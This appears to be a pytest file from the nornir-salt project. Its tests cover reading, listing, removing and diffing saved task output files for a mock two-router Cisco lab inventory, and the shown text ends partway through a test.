| 15.5 | 25 | 0.629032 | 22 | 124 | 3.363636 | 0.636364 | 0.189189 | 0.351351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 0.241935 | 124 | 7 | 26 | 17.714286 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | true | 0.2 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
24c7409f3a68b138de09ac0840721da726f3a368 | 41,509 | py | Python | tests/test_files_task_plugins.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 5 | 2021-01-22T09:34:55.000Z | 2021-12-22T08:12:34.000Z | tests/test_files_task_plugins.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 2 | 2022-01-27T14:46:40.000Z | 2022-02-28T16:59:01.000Z | tests/test_files_task_plugins.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 1 | 2021-01-10T04:37:08.000Z | 2021-01-10T04:37:08.000Z | import sys
import os
import pprint
import logging
import yaml
import pytest
import time
import json
sys.path.insert(0, "..")
try:
from nornir import InitNornir
from nornir.core.plugins.inventory import InventoryPluginRegister
from nornir.core.task import Result
HAS_NORNIR = True
except ImportError:
HAS_NORNIR = False
from nornir_salt import ResultSerializer
from nornir_salt import DictInventory
from nornir_salt import nr_test
from nornir_salt.plugins.processors.ToFileProcessor import ToFileProcessor
from nornir_salt.plugins.processors.DataProcessor import DataProcessor
from nornir_salt.plugins.tasks import file_read, file_remove, file_list, file_diff, files
logging.basicConfig(level=logging.ERROR)
# ----------------------------------------------------------------------
# Initialize Nornir
# ----------------------------------------------------------------------
skip_if_no_nornir = pytest.mark.skipif(
HAS_NORNIR == False,
reason="Failed to import all required Nornir modules and plugins",
)
skip_if_no_lab = None
lab_inventory = """
hosts:
IOL1:
hostname: 192.168.217.10
platform: ios
groups: [lab]
IOL2:
hostname: 192.168.217.7
platform: ios
groups: [lab]
groups:
lab:
username: cisco
password: cisco
defaults: {}
"""
lab_inventory_dict = yaml.safe_load(lab_inventory)
def init(opts):
"""
Initiate nornir by calling InitNornir()
"""
global skip_if_no_lab
nr = InitNornir(
logging={"enabled": False},
runner={"plugin": "serial"},
inventory={
"plugin": "DictInventory",
"options": {
"hosts": opts["hosts"],
"groups": opts.get("groups", {}),
"defaults": opts.get("defaults", {}),
},
},
)
return nr
InventoryPluginRegister.register("DictInventory", DictInventory)
nr = init(lab_inventory_dict)
def clean_up_folder():
# remove previous files and folder
if os.path.exists("./tofile_outputs/"):
for filen in os.listdir("./tofile_outputs/"):
os.remove("./tofile_outputs/" + filen)
os.rmdir("./tofile_outputs/")
def nr_test_grouped_subtasks(task, task_1, task_2):
"""
Test grouped task
"""
task.run(**task_1)
task.run(**task_2)
return Result(host=task.host, skip_results=True)
def generate_files(tf):
"""
Helper function to generate files by running task
"""
iol1_res_ntp = [
{"ntp": "1.1.1.1"},
]
iol2_res_ntp = [
{"ntp": "2.2.2.2"},
]
iol1_res_log = [
{"log": "3.3.3.3"},
]
iol2_res_log = [
{"log": "4.4.4.4"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf=tf, base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# ----------------------------------------------------------------------
# tests that need Nornir
# ----------------------------------------------------------------------
@skip_if_no_nornir
def test_file_read_task():
clean_up_folder()
iol1_res = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res = """
ntp server 7.7.7.7
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
output = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
# {'IOL1': {'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'Timestamp 12:12:12\n'
# '\n'
# 'ntp server 7.7.7.8\n'
# 'ntp server 7.7.7.7\n'
# ' \n'}},
# 'IOL2': {'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\nntp server 7.7.7.7\n \n'}}}
assert res["IOL1"]["show run | inc ntp"]["result"] == iol1_res
assert res["IOL2"]["show run | inc ntp"]["result"] == iol2_res
# test_file_read_task()
@skip_if_no_nornir
def test_file_read_task_last2():
clean_up_folder()
iol1_res = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res = """
ntp server 7.7.7.7
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# second, most current/latest run
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res + "IOL1 12345",
"IOL2": iol2_res + "IOL2 12345",
},
name="show run | inc ntp",
)
# retrieve file content
res1 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=1,
)
res2 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=2,
)
res1 = ResultSerializer(res1, add_details=True)
res2 = ResultSerializer(res2, add_details=True)
# pprint.pprint(res1)
# pprint.pprint(res2)
assert res2["IOL1"]["show run | inc ntp"]["result"] == iol1_res
assert res2["IOL2"]["show run | inc ntp"]["result"] == iol2_res
assert res1["IOL1"]["show run | inc ntp"]["result"] == iol1_res + "IOL1 12345"
assert res1["IOL2"]["show run | inc ntp"]["result"] == iol2_res + "IOL2 12345"
# test_file_read_task_last2()
@skip_if_no_nornir
def test_file_read_result_with_subtasks():
clean_up_folder()
iol1_res_ntp = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res_ntp = """
ntp server 7.7.7.7
"""
iol1_res_log = """
logging host 1.2.3.4
logging host 4.4.4.4
"""
iol2_res_log = """
logging host 5.5.5.5
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
# {'IOL1': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 1.2.3.4\n'
# 'logging host 4.4.4.4\n'
# ' '},
# 'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'Timestamp 12:12:12\n'
# '\n'
# 'ntp server 7.7.7.8\n'
# 'ntp server 7.7.7.7\n'
# ' '}},
# 'IOL2': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 5.5.5.5\n'
# ' '},
# 'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\nntp server 7.7.7.7\n '}}}
assert res["IOL1"]["show run | inc ntp"]["result"] == iol1_res_ntp
assert res["IOL1"]["show run | inc logging"]["result"] == iol1_res_log
assert res["IOL2"]["show run | inc ntp"]["result"] == iol2_res_ntp
assert res["IOL2"]["show run | inc logging"]["result"] == iol2_res_log
# test_file_read_result_with_subtasks()
@skip_if_no_nornir
def test_file_read_result_with_subtasks_task_name():
""" Should return task results for one task only """
clean_up_folder()
iol1_res_ntp = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res_ntp = """
ntp server 7.7.7.7
"""
iol1_res_log = """
logging host 1.2.3.4
logging host 4.4.4.4
"""
iol2_res_log = """
logging host 5.5.5.5
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
task_name="show run | inc logging"
)
res = ResultSerializer(res, add_details=True)
pprint.pprint(res)
# {'IOL1': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 1.2.3.4\n'
# 'logging host 4.4.4.4\n'
# ' '}},
# 'IOL2': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 5.5.5.5\n'
# ' '}}}
assert "show run | inc ntp" not in res["IOL1"]
assert res["IOL1"]["show run | inc logging"]["result"] == iol1_res_log
assert "show run | inc ntp" not in res["IOL2"]
assert res["IOL2"]["show run | inc logging"]["result"] == iol2_res_log
# test_file_read_result_with_subtasks_task_name()
@skip_if_no_nornir
def test_file_read_task_struct_data():
""" test that structured data save as a json and read back in struct """
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "2.2.2.2", "interface": "Gi2"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "4.4.4.4", "interface": "Gi2"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
output = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi2',
'ip': '2.2.2.2'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'}]}}}
# test_file_read_task_struct_data()
@skip_if_no_nornir
def test_file_read_task_struct_data_last2():
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "2.2.2.2", "interface": "Gi2"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "4.4.4.4", "interface": "Gi2"},
]
iol1_res_1 = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res_1 = [
{"ip": "4.4.4.4", "interface": "Gi2"},
{"ip": "2.2.2.2", "interface": "Gi2"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# second, most current/latest run - swap IOL1/2 results
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_1,
"IOL2": iol2_res_1,
},
name="show run | inc ntp",
)
# retrieve file content
res1 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=1,
)
res2 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=2,
)
res_last_1 = ResultSerializer(res1, add_details=True)
res_last_2 = ResultSerializer(res2, add_details=True)
pprint.pprint(res_last_1)
pprint.pprint(res_last_2)
_ = res_last_1["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res_last_1["IOL2"]['show run | inc ntp'].pop("timestamp")
_ = res_last_2["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res_last_2["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res_last_1 == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'},
{'interface': 'Gi2',
'ip': '2.2.2.2'}]}}}
assert res_last_2 == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi2',
'ip': '2.2.2.2'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'}]}}}
# test_file_read_task_struct_data_last2()
@skip_if_no_nornir
def test_file_read_task_struct_data_result_with_subtasks():
clean_up_folder()
iol1_res_ntp = [
{"ntp": "1.1.1.1"},
]
iol2_res_ntp = [
{"ntp": "2.2.2.2"},
]
iol1_res_log = [
{"log": "3.3.3.3"},
]
iol2_res_log = [
{"log": "4.4.4.4"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL1"]['show run | inc logging'].pop("timestamp")
_ = res["IOL2"]['show run | inc logging'].pop("timestamp")
assert res == {'IOL1': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '3.3.3.3'}]},
'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'ntp': '1.1.1.1'}]}},
'IOL2': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '4.4.4.4'}]},
'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'ntp': '2.2.2.2'}]}}}
# test_file_read_task_struct_data_result_with_subtasks()
@skip_if_no_nornir
def test_file_read_result_struct_data_with_subtasks_task_name():
""" Should return task results for one task only """
clean_up_folder()
iol1_res_ntp = [
{"ntp": "1.1.1.1"},
]
iol2_res_ntp = [
{"ntp": "2.2.2.2"},
]
iol1_res_log = [
{"log": "3.3.3.3"},
]
iol2_res_log = [
{"log": "4.4.4.4"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
task_name="show run | inc logging"
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc logging'].pop("timestamp")
_ = res["IOL2"]['show run | inc logging'].pop("timestamp")
assert res == {'IOL1': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '3.3.3.3'}]}},
'IOL2': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '4.4.4.4'}]}}}
# test_file_read_result_struct_data_with_subtasks_task_name()
@skip_if_no_nornir
def test_file_read_struct_data_with_DataProcessor_lod_filter():
""" test tofile write and after that read passing via lod filter """
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "1.2.2.2", "interface": "Gi2"},
{"ip": "1.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "1.2.4.4", "interface": "Gi2"},
]
# run task to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
output = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# retrieve file content passing it through data processor
nr_with_dp = nr.with_processors([DataProcessor(
[{"fun": "lod_filter", "ip": "1.2.*", "interface": "Gi[23]"}]
)])
res = nr_with_dp.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '1.2.2.2'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '1.2.4.4'}]}}}
# test_file_read_struct_data_with_DataProcessor_lod_filter()
@skip_if_no_nornir
def test_file_list_get_all_files():
""" produces list of files """
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# retrieve file content
res = nr.run(
task=file_list,
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
assert isinstance(res["IOL1"]["file_list"]["result"], list)
assert len(res["IOL1"]["file_list"]["result"]) == 4
assert res["IOL1"]["file_list"]["exception"] == None
assert isinstance(res["IOL2"]["file_list"]["result"], list)
assert len(res["IOL2"]["file_list"]["result"]) == 4
assert res["IOL2"]["file_list"]["exception"] == None
# test_file_list_get_all_files()
@skip_if_no_nornir
def test_file_list_get_one_filegroup():
""" produces list of files """
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# retrieve files list
res = nr.run(
task=file_list,
base_url="./tofile_outputs/",
filegroup="ip"
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
assert isinstance(res["IOL1"]["file_list"]["result"], list)
assert len(res["IOL1"]["file_list"]["result"]) == 1
assert res["IOL1"]["file_list"]["result"][0]["filegroup"] == "ip"
assert res["IOL1"]["file_list"]["exception"] == None
assert isinstance(res["IOL2"]["file_list"]["result"], list)
assert len(res["IOL2"]["file_list"]["result"]) == 1
assert res["IOL2"]["file_list"]["result"][0]["filegroup"] == "ip"
assert res["IOL2"]["file_list"]["exception"] == None
# test_file_list_get_one_filegroup()
@skip_if_no_nornir
def test_file_remove_all():
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# check if folder is not empty
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 9, "not all files saved"
# run task to delete all data files
# retrieve files list
res = nr.run(
task=file_remove,
base_url="./tofile_outputs/",
filegroup=True,
)
res = ResultSerializer(res, add_details=True)
# check if folder is cleaned
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 1, "not all files removed"
# pprint.pprint(res)
assert len(res["IOL1"]["file_remove"]["result"]) == 4
assert len(res["IOL2"]["file_remove"]["result"]) == 4
# retrieve files list
files_list = nr.run(
task=file_list,
base_url="./tofile_outputs/",
filegroup="ip"
)
files_list = ResultSerializer(files_list, add_details=True)
# pprint.pprint(files_list)
assert len(files_list["IOL1"]["file_list"]["result"]) == 0
assert len(files_list["IOL2"]["file_list"]["result"]) == 0
# try to generate more files to check if it will not fail
generate_files(tf="interfaces")
# test_file_remove_all()
@skip_if_no_nornir
def test_file_remove_filegroup():
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# check if folder is not empty
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 9, "not all files saved"
# run task to delete all data files
# retrieve files list
res = nr.run(
task=file_remove,
base_url="./tofile_outputs/",
filegroup="interfaces"
)
res = ResultSerializer(res, add_details=True)
# check if folder is cleaned
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 3, "Too many files removed"
# pprint.pprint(res)
assert len(res["IOL1"]["file_remove"]["result"]) == 3
assert len(res["IOL2"]["file_remove"]["result"]) == 3
# check index file was updated accordingly
index_file = "./tofile_outputs/tf_index_common.json"
with open(index_file, "r") as f:
index_data = json.loads(f.read())
assert index_data["interfaces"] == {}, "interfaces files data not removed from index"
assert len(index_data["ip"]) == 2, "ip files data removed from index"
# test_file_remove_filegroup()
@skip_if_no_nornir
def test_file_diff_whole_result_last_1_2():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.7.8
+ntp server 7.7.6.8
ntp server 7.7.7.7
+ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.7
+ntp server 7.7.7.9""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result()
@skip_if_no_nornir
def test_file_diff_whole_result_last_2_1():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=[2,1]
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.6.8
+ntp server 7.7.7.8
ntp server 7.7.7.7
-ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.9
+ntp server 7.7.7.7""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_2_1()
@skip_if_no_nornir
def test_file_diff_whole_result_last_out_of_range():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=151
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
print(res["IOL1"]["ntp_config"]["result"])
print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.7.8
+ntp server 7.7.6.8
ntp server 7.7.7.7
+ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.7
+ntp server 7.7.7.9""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_out_of_range()
@skip_if_no_nornir
def test_file_diff_whole_result_last_both_out_of_range():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=[100,151]
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
assert res["IOL1"]["ntp_config"]["failed"] == True
assert "new and old files are same" in res["IOL1"]["ntp_config"]["exception"]
assert res["IOL2"]["ntp_config"]["failed"] == True
assert "new and old files are same" in res["IOL2"]["ntp_config"]["exception"]
# test_file_diff_whole_result_last_both_out_of_range()
@skip_if_no_nornir
def test_file_diff_whole_result_last_2_1_string():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
